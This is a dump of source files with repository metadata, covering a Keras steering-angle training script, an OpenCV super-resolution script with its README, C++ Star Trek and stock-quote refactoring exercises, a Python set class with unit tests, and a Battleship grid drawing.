"language": "Python",
"length_bytes": 1324,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 30,
"path": "/results/plot_frequencies.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef get_extracted_data(missing_data_percentage, iteration_number, imputation_method=None):\n if imputation_method:\n filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/{}/' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(imputation_method.description,\n missing_data_percentage, iteration_number)\n else:\n filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(missing_data_percentage, iteration_number)\n\n data = np.genfromtxt(filename, delimiter=',')\n\n # Pegando apenas as frequências\n data = data[:, [0, 1]]\n return data\n\n\nfull_data_0_percent = get_extracted_data(missing_data_percentage=0, iteration_number=0)\nfull_data_5_percent = get_extracted_data(missing_data_percentage=10, iteration_number=0)\n\nplt.xlabel('f1')\nplt.ylabel('f2')\nplt.scatter(full_data_0_percent[:, 0], full_data_0_percent[:, 1], s=20, cmap='viridis', label=\"{}%\".format(0))\nplt.scatter(full_data_5_percent[:, 0], full_data_5_percent[:, 1], s=20, cmap='viridis', label=\"{}%\".format(10))\n\nplt.legend()\nplt.show()\n"
},
{
"alpha_fraction": 0.6491228342056274,
"alphanum_fraction": 0.6491228342056274,
"avg_line_length": 27.5,
"blob_id": "db6f3ee63f61caac0e6667af70b91c898b98fc1d",
"content_id": "eb0ea94d172c0294f0b269fdc7c62a239c1a03ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 10,
"path": "/components/missing_data_amputator.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass MissingDataAmputator:\n def __init__(self, data):\n self.data = data\n\n def amputate_data(self):\n \"\"\"Removes all samples that have numpy.NaN as theirs values and returns a new list\"\"\"\n return [x for x in self.data if not np.isnan(x)]\n"
},
{
"alpha_fraction": 0.5866666436195374,
"alphanum_fraction": 0.5911111235618591,
"avg_line_length": 20.634614944458008,
"blob_id": "66555572fc1165d863e249b0b590487b00e340aa",
"content_id": "6061fa53df0b01aca8a84dff8064167a6f0c0f7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1125,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 52,
"path": "/algorithms/data_imputation/DataImputation.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nfrom fancyimpute import KNN\n\n\nclass MeanImputation:\n description = 'Mean_Imputation'\n\n @staticmethod\n def impute_data(data):\n df = pd.DataFrame(data)\n\n df = df.fillna(np.nanmean(data))\n\n return df[0].values.tolist()\n\n\nclass InterpolationImputation:\n description = 'Interpolation_Imputation'\n\n @staticmethod\n def impute_data(data):\n s = pd.Series(data)\n\n return s.interpolate().tolist()\n\n\nclass KNNImputation:\n description = 'KNN_Imputation'\n\n @staticmethod\n def impute_data(data, original_data):\n matrix = [data]\n\n for i in range(0, 250):\n matrix.append(original_data)\n\n full_data = KNN().complete(matrix)\n\n print(full_data)\n return full_data\n\n\n # class MICEImputation:\n # description = 'MICE_Imputation'\n #\n # @staticmethod\n # def impute_data(data):\n # full_data = IterativeSVD(gradual_rank_increase=False).complete(np.matrix([data]))\n #\n # print(full_data)\n # return full_data\n"
},
{
"alpha_fraction": 0.6364942789077759,
"alphanum_fraction": 0.6408045887947083,
"avg_line_length": 20.75,
"blob_id": "7355031dcdad635f93b84daab3eed5989ff7b6ca",
"content_id": "8cf998460699864e0db0d567f9f824dc7d99e9f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1395,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 64,
"path": "/components/data_imputation/DataImputation.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nfrom fancyimpute import KNN\n\n\nclass MeanImputation:\n description = 'Mean_Imputation'\n descricao = \"Média\"\n\n @staticmethod\n def impute_data(data):\n df = pd.DataFrame(data)\n\n df = df.fillna(np.nanmean(data))\n\n return df[0].values.tolist()\n\n\nclass InterpolationImputation:\n description = 'Interpolation_Imputation'\n descricao = 'Interpolação'\n\n @staticmethod\n def impute_data(data):\n s = pd.Series(data)\n\n # interpolation_result = s.interpolate().dropna().tolist()\n interpolation_result = s.interpolate(limit_direction='both').tolist()\n\n return interpolation_result\n\n\nclass KNNImputation:\n description = 'KNN_Imputation_N_3'\n descricao = 'KNN'\n\n @staticmethod\n def impute_data(data):\n print('# imputing data KNN')\n full_data = KNN(k=3).complete(data)\n\n return full_data\n\n\nclass KNNImputation_7:\n description = 'KNN_Imputation_N_7'\n\n @staticmethod\n def impute_data(data):\n print('# imputing data KNN')\n full_data = KNN(k=7).complete(data)\n\n return full_data\n\n\n# class MICEImputation:\n# description = 'MICE_Imputation'\n#\n# @staticmethod\n# def impute_data(data):\n# full_data = IterativeSVD(gradual_rank_increase=False).complete(np.matrix([data]))\n#\n# print(full_data)\n# return full_data\n"
}
] | 16 |
flyflo86/Clone
|
https://github.com/flyflo86/Clone
|
fcad05f67c249c73d7c570381b301fef03d51970
|
3972411f58f3f40c28f2df3a64367327b9b327a7
|
f344d910752c2943677a634e32a234d5d596df65
|
refs/heads/master
| 2021-01-01T17:58:32.822791 | 2017-08-07T15:02:59 | 2017-08-07T15:02:59 | 98,207,440 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5901308059692383,
"alphanum_fraction": 0.6062958836555481,
"avg_line_length": 38.00425720214844,
"blob_id": "0ad4b91ff176162f107279b300ba79b80b691818",
"content_id": "8eb8917d5bc8cb0cb7ec40fd9ea37e163ab285c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9403,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 235,
"path": "/model.py",
"repo_name": "flyflo86/Clone",
"src_encoding": "UTF-8",
"text": "import csv\r\nimport cv2\r\nimport numpy as np\r\n#import keras\r\nfrom os.path import split\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout\r\nfrom keras.callbacks import ModelCheckpoint, Callback\r\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\r\n\r\n\r\n\r\nbatch_size_generator = 128\r\n#resized image dimension in training\r\n#img_rows = 66\r\n#img_cols = 200\r\nimg_rows = 66\r\nimg_cols = 200\r\n\r\nangle_threshold = 3.0\r\n\r\ndef display_image(image):\r\n# cv2.imshow('image',image)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()\r\n plt.figure()\r\n plt.imshow(image)\r\n\r\ndef prepro_image(image):\r\n # cropping the image (upper and lower part don't contain important information)\r\n adapted_image = image[60:140,:,:]\r\n # apply subtle blur\r\n #adapted_image = cv2.GaussianBlur(adapted_image, (3,3), 0)\r\n # Scaling to shape input of model is expecting (200x66)\r\n adapted_image = cv2.resize(adapted_image,(img_cols, img_rows), interpolation = cv2.INTER_AREA)\r\n # Converting to YUV \r\n #adapted_image = cv2.cvtColor(adapted_image, cv2.COLOR_RGB2YUV)\r\n return adapted_image\r\n\r\n\r\n#*****************************DATA PREPARATION*******************************************\r\nlines=[]\r\n#with open('../data/driving_log.csv') as file:\r\nwith open('data_downloaded/driving_log.csv') as csvfile:\r\n reader=csv.reader(csvfile)\r\n for line in reader:\r\n lines.append(line)\r\n\r\n#Current Path\r\ndef current_path(image_direction, line):\r\n source_path = line[image_direction]\r\n filename = split(source_path)[1]\r\n current_path = './data_downloaded/IMG/' + filename\r\n# current_path = '../data/IMG/' + filename\r\n return current_path \r\n\r\ndef generate_training_path_sources(lines):\r\n image_paths, angles = [], []\r\n for line in lines:\r\n current_path_center = current_path(0,line)\r\n current_path_right = current_path(1,line)\r\n current_path_left = current_path(2,line)\r\n steering_center = float(line[3])\r\n # create adjusted steering measurements for the side camera images\r\n correction = 0.25 # this is a parameter to tune\r\n steering_left = steering_center + correction\r\n steering_right = steering_center - correction\r\n image_paths.append(current_path_center)\r\n image_paths.append(current_path_left)\r\n image_paths.append(current_path_right)\r\n angles.append(steering_center)\r\n angles.append(steering_left)\r\n angles.append(steering_right)\r\n \r\n return image_paths, angles\r\n\r\n#*********************Training Data Generator*************************************************\r\n\r\n\r\ndef estimate_samples_per_epoch(angles):\r\n counter=0\r\n for i in range(len(angles)):\r\n counter = counter+1\r\n angle = angles[i]\r\n # Data Augmentation: if steering angle is above a certain threshold, the image is flipped horizontally and also added to the training data\r\n if abs(angle) > angle_threshold:\r\n counter = counter+1\r\n return counter\r\n\r\n\r\n\r\n#Reading Data from Training Simulator and adding side camera images\r\ndef generate_data_training(image_paths, angles, batch_size_generator):\r\n image_paths, angles = shuffle(image_paths, angles)\r\n while True: \r\n images,measurements = ([],[])\r\n for i in range(len(angles)):\r\n image = cv2.imread(image_paths[i])\r\n angle = angles[i]\r\n image = prepro_image(image)\r\n images.append(image)\r\n 
measurements.append(angle)\r\n if len(measurements) == batch_size_generator:\r\n yield (np.array(images), np.array(measurements))\r\n images, measurements = ([],[])\r\n #image_paths, angles = shuffle(image_paths, angles)\r\n # Data Augmentation: if steering angle is above a certain threshold, the image is flipped horizontally and also added to the training data\r\n if abs(angle) > angle_threshold:\r\n image = cv2.flip(image, 1)\r\n angle *= -1\r\n images.append(image)\r\n measurements.append(angle)\r\n if len(measurements) == batch_size_generator:\r\n yield (np.array(images), np.array(measurements))\r\n images, measurements = ([],[])\r\n #image_paths, angles = shuffle(image_paths, angles)\r\ndef generate_data_training_visual(image_paths, angles, batch_size_generator):\r\n image_paths, angles = shuffle(image_paths, angles)\r\n images,measurements = ([],[])\r\n while True: \r\n for i in range(len(angles)):\r\n image = cv2.imread(image_paths[i])\r\n angle = angles[i]\r\n image = prepro_image(image)\r\n images.append(image)\r\n measurements.append(angle)\r\n if len(measurements) == batch_size_generator:\r\n return (np.array(images), np.array(measurements))\r\n\r\n # Data Augmentation: if steering angle is above a certain threshold, the image is flipped horizontally and also added to the training data\r\n if abs(angle) > angle_threshold:\r\n image = cv2.flip(image, 1)\r\n angle *= -1\r\n images.append(image)\r\n measurements.append(angle)\r\n if len(measurements) == batch_size_generator:\r\n return (np.array(images), np.array(measurements))\r\n\r\n \r\n#**********Splitting Data in Train/Test*******************\r\nimage_paths, angles = generate_training_path_sources(lines)\r\nsamples_per_epoch = estimate_samples_per_epoch(angles)\r\nimage_paths_train, image_paths_test, angles_train, angles_test = train_test_split(image_paths, angles, test_size=0.2, random_state=42)\r\nimages, measurements = generate_data_training_visual(image_paths,angles,batch_size_generator)\r\n\r\nsize_train=np.array(image_paths_train).shape[0] \r\nsize_test=np.array(image_paths_test).shape[0] \r\n \r\nprint('Train Dataset size:', np.array(image_paths_train).shape, np.array(angles_train).shape)\r\nprint('Test Dataset size:', np.array(image_paths_test).shape, np.array(angles_test).shape)\r\nprint('Image SHAPE:', images[0].shape)\r\n\r\n\r\n#*********************************Visualizing DATA******************************************\r\n#display_image(images[1])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#************************Model*********************************************************\r\nTraining_Mode=True \r\nif Training_Mode==True:\r\n# \r\n# model = Sequential([\r\n#\t\t\tLambda(lambda x: x/127.5 - 1.,input_shape=(img_rows,img_cols,3)),\r\n#\t\t\tConvolution2D(2, 3, 3, border_mode='valid', input_shape=(img_rows,img_cols,3), activation='relu'),\r\n#\t\t\tMaxPooling2D((4,4),(4,4),'valid'),\r\n#\t\t\tDropout(0.25),\r\n#\t\t\tFlatten(),\r\n#\t\t\tDense(1)\r\n#\t\t])\r\n#\r\n# print(model.summary())\r\n\r\n \r\n model = Sequential()\r\n \r\n model.add(Lambda(lambda x: x / 127.5-1.0, input_shape=(img_rows,img_cols,3)))\r\n #model.add(Cropping2D(cropping=((70,25),(0,0))))\r\n model.add(Convolution2D(24,5,5,subsample=(2,2),activation=\"relu\"))\r\n model.add(Convolution2D(36,5,5,subsample=(2,2),activation=\"relu\"))\r\n model.add(Convolution2D(48,5,5,subsample=(2,2),activation=\"relu\"))\r\n model.add(Convolution2D(64,3,3,activation=\"relu\"))\r\n model.add(Convolution2D(64,3,3,activation=\"relu\"))\r\n model.add(Flatten())\r\n 
model.add(Dense(100))\r\n model.add(Dense(50))\r\n model.add(Dense(10))\r\n model.add(Dense(1))\r\n #************************Training the Model**********************************************\r\n epochs=12\r\n #Compile the Model\r\n model.compile(loss='mse', optimizer='adam')\r\n # initializing Generators\r\n train_data_gen = generate_data_training(image_paths_train, angles_train, batch_size_generator)\r\n val_data_gen = generate_data_training(image_paths_test, angles_test, batch_size_generator)\r\n test_data_gen = generate_data_training(image_paths_test, angles_test, batch_size_generator)\r\n\r\n checkpoint = ModelCheckpoint('model{epoch:02d}.h5')\r\n\r\n # validation runs on the test split, so pass its size as nb_val_samples\r\n history_object = model.fit_generator(train_data_gen, validation_data=val_data_gen, samples_per_epoch = samples_per_epoch, nb_epoch = epochs, verbose=1, callbacks=[checkpoint], nb_val_samples=size_test)\r\n \r\n print('Test Loss:', model.evaluate_generator(test_data_gen, batch_size_generator))\r\n\r\n print(model.summary())\r\n \r\n model.save('model.h5')\r\n \r\n # Visualizing Predictions\r\n number_predictions = 6\r\n X_test, y_test = generate_data_training_visual(image_paths_test, angles_test, 6)\r\n y_pred = model.predict(X_test, number_predictions, verbose=2)\r\n \r\n \r\n \r\n #**********************Visualizing the training performance*******************************\r\n ### print the keys contained in the history object\r\n print(history_object.history.keys())\r\n \r\n ### plot the training and validation loss for each epoch\r\n plt.plot(history_object.history['loss'])\r\n plt.plot(history_object.history['val_loss'])\r\n plt.title('model mean squared error loss')\r\n plt.ylabel('mean squared error loss')\r\n plt.xlabel('epoch')\r\n plt.legend(['training set', 'validation set'], loc='upper right')\r\n plt.show() "
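The training generator above doubles sharp-turn samples by mirroring the frame and negating the steering angle. That augmentation step in isolation, using OpenCV's horizontal flip as the script does (the threshold value here is illustrative only, not the script's constant):

```python
import cv2
import numpy as np


def augment(image, angle, threshold=0.3):
    """Yield the original sample, plus a mirrored copy for large steering angles."""
    yield image, angle
    if abs(angle) > threshold:
        yield cv2.flip(image, 1), -angle  # flip around the vertical axis


frame = np.zeros((66, 200, 3), dtype=np.uint8)   # same shape the model expects
print(len(list(augment(frame, 0.5))))            # 2: original + flipped
```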
}
] | 1 |
bobbigmac/superres_with_docker
|
https://github.com/bobbigmac/superres_with_docker
|
481689c2441a6a1d508a4b6682491d223e7dde46
|
101046e4760295dda81d184a8adac23ec228aa97
|
f27b5098c107011ceeb2245e4de14c20034d1730
|
refs/heads/master
| 2022-07-02T06:24:28.363846 | 2020-05-15T00:40:10 | 2020-05-15T00:40:10 | 263,455,115 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7313253283500671,
"alphanum_fraction": 0.7566264867782593,
"avg_line_length": 26.700000762939453,
"blob_id": "06f0718d36164d22a2aa7f7480b97d6848d3c812",
"content_id": "482dfb7f181f6da388dfdab82c55b2141ea72865",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 830,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 30,
"path": "/test-upsize.py",
"repo_name": "bobbigmac/superres_with_docker",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom cv2 import dnn_superres\n\n# Create an SR object\nsr = dnn_superres.DnnSuperResImpl_create()\n\n#TODO: Colour correct, autolevel, convert to png\n\n# Read image\nimage = cv2.imread('/test/images/frame1.png')\n# image = cv2.imread('/test/images/smol3.png')\n\n# Read the desired model\npath = \"/test/models/model1/EDSR_x2.pb\"\nsr.readModel(path)\n\n# Set the desired model and scale to get correct pre- and post-processing\nsr.setModel(\"edsr\", 2)\n\n# Upscale the image\nresult = sr.upsample(image)\n\n# Save the image\ncv2.imwrite(\"/test/images/frame1upscaled.png\", result)\n#cv2.imwrite(\"/test/images/art1up2.jpg\", result)\n\n#TODO potrace to vector\n#TODO maybe useful https://gist.github.com/zph/2494870\n#TODO maybe useful https://github.com/unpaper/unpaper\n#TODO maybe useful http://www.fmwconcepts.com/imagemagick/textcleaner/index.php"
},
{
"alpha_fraction": 0.7438316345214844,
"alphanum_fraction": 0.7612481713294983,
"avg_line_length": 54.15999984741211,
"blob_id": "86d8c1dc3744fea35c1fd95c042df21fdbb9e7ef",
"content_id": "ad73786df330095f34471cb9b96ad4feeb35235a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1378,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 25,
"path": "/README.md",
"repo_name": "bobbigmac/superres_with_docker",
"src_encoding": "UTF-8",
"text": "# Docker image\n\nInstall [docker_python-opencv-ffmpeg](https://github.com/Borda/docker_python-opencv-ffmpeg), then run as below.\n\nSee [Deep Learning based Super Resolution with OpenCV](https://towardsdatascience.com/deep-learning-based-super-resolution-with-opencv-4fd736678066)\n\n# Run\n\n```\ndocker run -v /home/bobbigmac/projects/a_demos/opencv/:/test/ --rm -it python-opencv-ffmpeg:py36 python /test/test-upsize.py\ndocker run -v G:\\\\projects\\\\opencv:/test/ --rm -it python-opencv-ffmpeg:py36 python /test/test-upsize.py\n```\n\n# Models\n\nThere are currently 4 different SR models supported in the module. They can all upscale images by a scale of 2, 3 and 4. LapSRN can even upscale by a factor of 8. They differ in accuracy, size and speed.\n\n- EDSR [1]. This is the best performing model. However, it is also the biggest model and therefor has the biggest file size and slowest inference. You can download it here.\n- ESPCN [2]. This is a small model with fast and good inference. It can do real-time video upscaling (depending on image size). You can download it here.\n- FSRCNN [3]. This is also small model with fast and accurate inference. Can also do real-time video upscaling. You can download it here.\n- LapSRN [4]. This is a medium sized model that can upscale by a factor as high as 8. You can download it here.\n\n# TODO\n\n- Need imput parameters and multiple model switching"
}
] | 2 |
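The README's TODO asks for input parameters and model switching. A minimal sketch of what that could look like, reusing only the `dnn_superres` calls already shown in `test-upsize.py`; the model-file layout under `/test/models/` is an assumption:

```python
import argparse
import cv2
from cv2 import dnn_superres

parser = argparse.ArgumentParser(description='Parameterised super-resolution')
parser.add_argument('input', help='path to the input image')
parser.add_argument('output', help='path for the upscaled image')
parser.add_argument('--model', default='edsr',
                    choices=['edsr', 'espcn', 'fsrcnn', 'lapsrn'])
parser.add_argument('--scale', type=int, default=2)
args = parser.parse_args()

sr = dnn_superres.DnnSuperResImpl_create()
# Assumed naming scheme, e.g. /test/models/model1/EDSR_x2.pb in the repo;
# adjust the path to wherever the .pb files actually live.
sr.readModel('/test/models/{}_x{}.pb'.format(args.model.upper(), args.scale))
sr.setModel(args.model, args.scale)
cv2.imwrite(args.output, sr.upsample(cv2.imread(args.input)))
```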
driscollis/labs-cpp-gtest
|
https://github.com/driscollis/labs-cpp-gtest
|
45c75a3703073ab0759e19be29df5ff96e236567
|
733706b15ec668ac15fbbf4ee6b40e05241663b2
|
172a63469cf87b40492014c26b825ed00b4e4d8a
|
refs/heads/master
| 2021-10-24T06:34:51.728417 | 2017-03-09T20:57:07 | 2017-03-09T20:57:07 | 84,127,136 | 0 | 0 | null | 2017-03-06T22:23:16 | 2016-05-20T11:18:53 | 2016-05-20T11:18:49 | null |
[
{
"alpha_fraction": 0.5218181610107422,
"alphanum_fraction": 0.5490909218788147,
"avg_line_length": 12.75,
"blob_id": "0f0c433ce3619c9db7378d755ce53f77eb2b6bf6",
"content_id": "dffe4f3d7eab8608bff61e4f7c242626b93e9c25",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 550,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 40,
"path": "/MessTrek/src/StarTrek/Klingon.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef KLINGON_HEADER\n#define KLINGON_HEADER\n\n\n#include <cstdlib>\n#include <time.h>\n\nnamespace StarTrek {\n\nclass Klingon {\nprivate:\n int distance_;\n int energy_;\n\npublic:\n Klingon() {\n srand(time(NULL));\n distance_ = (100 + rand() % 4000);\n energy_ = (1000+ rand() % 2000);\n }\n\n virtual int distance() {\n return distance_;\n }\n\n virtual int energy() {\n return energy_;\n }\n\n virtual void energy(int value) {\n energy_ = value;\n }\n\n virtual void destroy() {\n }\n\n};\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.5966330170631409,
"alphanum_fraction": 0.6074073910713196,
"avg_line_length": 26.0181827545166,
"blob_id": "d4b0131afdc2178e06bef275996c5b54d5a93d31",
"content_id": "abc1b0b1878f79590eb0d34511cd1b38f89d138a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1485,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 55,
"path": "/pyset/setlisttest.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import pysetlist\n\nimport unittest\n\nclass TestPySet(unittest.TestCase):\n\n def setUp(self):\n self.my_set = pysetlist.Set()\n\n def test_set_empty(self):\n self.assertFalse(self.my_set.internal_list)\n\n def test_append(self):\n self.my_set.append(5)\n self.assertIn(5, self.my_set)\n\n def test_cannot_append_zero(self):\n \"\"\"\n Tests that we can't add zero to the set\n Also checks that the set remains empty\n \"\"\"\n self.my_set.append(0)\n self.assertNotIn(0, self.my_set)\n self.assertFalse(self.my_set.internal_list)\n\n def test_cannot_add_negative_numbers(self):\n self.my_set.append(-1)\n self.assertNotIn(-1, self.my_set)\n\n def test_cannot_add_same_item_twice(self):\n self.my_set.append(1)\n self.my_set.append(1)\n self.assertNotEqual(self.my_set.count(1), 2)\n self.assertEqual(self.my_set.count(1), 1)\n\n def test_remove_item(self):\n \"\"\"\n Tests that after adding and removing a single item, the\n set is empty\n \"\"\"\n self.my_set.append(1)\n self.my_set.remove(1)\n self.assertFalse(self.my_set.internal_list)\n\n def test_empty_intersections(self):\n my_set2 = pysetlist.Set()\n self.my_set.intersection(my_set2.internal_list)\n self.assertFalse(self.my_set.internal_list)\n\n def tearDown(self):\n self.my_set = None\n del self.my_set\n\nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.698113203048706,
"alphanum_fraction": 0.698113203048706,
"avg_line_length": 14.142857551574707,
"blob_id": "b2ef4dedf666c0d447a2f0ef40fb35ee9c39c79f",
"content_id": "9297a9641dc44ba25911f076f8070d5a58f4cb9f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 106,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 7,
"path": "/TestedTrek/TestedTrek/src/StarTrek/RandGenerator.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"RandGenerator.h\"\n\nRandom generator;\n\nint rnd(int maximum) {\n return generator() % maximum;\n}\n"
},
{
"alpha_fraction": 0.6515581011772156,
"alphanum_fraction": 0.6827195286750793,
"avg_line_length": 12.576923370361328,
"blob_id": "aa7c759f6f66fc6e145a219b17b44c22179c25ab",
"content_id": "de3b0dc73c0642e081e8ae1249e0e01ef557e2d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 353,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 26,
"path": "/TestedTrek/TestedTrek/src/StarTrek/PhotonTorpedo.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"PhotonTorpedo.h\"\n\n#include \"RandGenerator.h\"\n\nnamespace StarTrek\n{\n\nPhotonTorpedo::PhotonTorpedo()\n{\n}\n\nPhotonTorpedo::~PhotonTorpedo()\n{\n}\n\nint PhotonTorpedo::getPhotonTorpDamage()\n{\n return 800 + rnd(50);\n}\n\nbool PhotonTorpedo::didTorpedoHit( int distance )\n{\n return (rnd(4) + ((distance / 500) + 1) <= 7);\n}\n\n} // namespace StarTrek\n"
},
{
"alpha_fraction": 0.5569307208061218,
"alphanum_fraction": 0.6225247383117676,
"avg_line_length": 26.89655113220215,
"blob_id": "1dc7314faf912d390fa00bbda778ff2a53ec28a1",
"content_id": "fd2e83631e05844c1282a4df195e93d067a37310",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 808,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 29,
"path": "/battleship/bui.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import arcade\n\narcade.open_window(\"Battleship\", 600, 600)\n\narcade.set_background_color(arcade.color.WHITE)\n\narcade.start_render()\n\n# Draw a grid\n# Draw vertical lines every 120 pixels\ntext_offset = 500\nrow_number = 1\narcade.draw_text(\"Simple line of text in 12 point\", 50, 50, arcade.color.BLACK, 12)\nfor x in range(0, 661, 60):\n arcade.draw_line(x, 0, x, 600, arcade.color.BLACK, 2)\n arcade.draw_text(text=\"{}\".format(row_number), \n start_x=40, \n start_y=text_offset, \n color=arcade.color.BLACK,\n font_size=12)\n text_offset -= 50\n row_number += 1\n\n# Draw horizontal lines every 200 pixels\nfor y in range(0, 661, 60):\n arcade.draw_line(0, y, 800, y, arcade.color.BLACK, 2)\n \narcade.finish_render()\narcade.run()"
},
{
"alpha_fraction": 0.6585366129875183,
"alphanum_fraction": 0.6707317233085632,
"avg_line_length": 21.363636016845703,
"blob_id": "0af832b97c71d80790857a49632310c14482db96",
"content_id": "632403a359d3500ab4f93c13f61f23cb544012bd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 492,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 22,
"path": "/LunEx/src/stockquote.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"LunExServices.h\"\n#include \"stockquote.h\"\n\nStockQuote::StockQuote( std::string symbol, LunExServices& service )\n : m_symbol( symbol ), m_service( service )\n{\n m_price = m_service.currentPrice( m_symbol.c_str() );\n}\n\ndouble StockQuote::Price( double shares ) const\n{\n return shares * m_price;\n}\n\ndouble StockQuote::Total( double shares ) const\n{\n double subtotal, total;\n subtotal = shares * m_price;\n total = subtotal + subtotal * 0.02 + 10.0;\n\n return total;\n}\n"
},
{
"alpha_fraction": 0.7112461924552917,
"alphanum_fraction": 0.7112461924552917,
"avg_line_length": 20.45652198791504,
"blob_id": "2e2773626b5436c0063cb26f25585272f2b7254c",
"content_id": "8b4c2b40991ca5a4172b9c84aa0e4015cc8b5270",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 987,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 46,
"path": "/TestedTrek/TestedTrek/src/StarTrek/Game.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef GAME_HEADER\n#define GAME_HEADER\n\n\n#include <Untouchables/WebGadget.h>\n\n#include \"Phaser.h\"\n#include \"PhotonTorpedo.h\"\n#include \"RandGenerator.h\"\n\nnamespace StarTrek {\n\nclass Galaxy;\nclass Klingon;\n\nclass Game {\nprivate:\n int phaser_ammo;\n int photon_torpedos;\n\n Phaser m_phaser;\n PhotonTorpedo m_photon_torp;\n\n void hitKlingon( Klingon* enemy, int damage, Galaxy& galaxy );\n\n bool hasEnoughPhaserAmmo( int amount );\n bool hasEnoughPhotoTorpedos();\n void reducePhaserAmmo( int amount );\n void reducePhotoTorpedos();\n void photonTorpedoMissed( int distance, Galaxy& galaxy );\n\n void attackWithPhaser( Klingon* enemy, int amount, int distance, Galaxy& galaxy );\n void attackPhotonTorpedo( Klingon* enemy, int distance, Galaxy& galaxy );\n\npublic:\n Game();\n void fireWeapon(Untouchables::WebGadget* wg);\n void fireWeapon(Galaxy& galaxy);\n int energyRemaining(void);\n void torpedoes(int value);\n int torpedoes(void);\n};\n\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.4951612949371338,
"alphanum_fraction": 0.4951612949371338,
"avg_line_length": 24.77083396911621,
"blob_id": "4023021bc8a84a08a88897d2069787bf5575c42b",
"content_id": "3672121932a880153cfe33570eec5cde0a0c8364",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1240,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 48,
"path": "/pyset/pyset.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
